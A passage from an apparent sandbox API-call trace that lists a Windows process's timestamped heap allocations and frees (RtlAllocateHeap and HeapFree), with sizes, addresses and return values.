returned 1 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103a70 | out: hHeap=0xe0000) returned 1 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xe6ed8 | out: hHeap=0xe0000) returned 1 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105b20 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106390 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x109140 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f70 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x108df8 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b60 [0036.241] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106420 [0036.241] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0036.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103cb0 [0036.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x106420 [0036.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103cb0 | out: hHeap=0xe0000) returned 1 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0036.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.242] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0036.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106300 | out: hHeap=0xe0000) returned 1 [0036.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a90 | out: hHeap=0xe0000) returned 1 [0036.503] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105d60 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b20 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105cd0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1065d0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105e80 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107050 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107560 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106e10 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106fc0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1073b0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x107b00 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105bb0 | out: hHeap=0xe0000) returned 1 [0036.504] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0036.504] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0036.504] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a90 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106540 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x108bc8 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f70 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x1096b8 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103cb0 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105f10 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103d10 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105c40 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103d10 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105c40 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.506] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0036.507] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103cb0 | out: hHeap=0xe0000) returned 1 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106420 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1064b0 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106390 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1057c0 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106150 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105fa0 [0036.507] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105b20 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1058e0 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105e80 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105850 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a00 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105970 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105bb0 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1056a0 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1065d0 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105c40 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105cd0 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1061e0 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105d60 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1060c0 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105730 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105df0 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105f10 [0036.508] RtlAllocateHeap (HeapHandle=0xe0000, 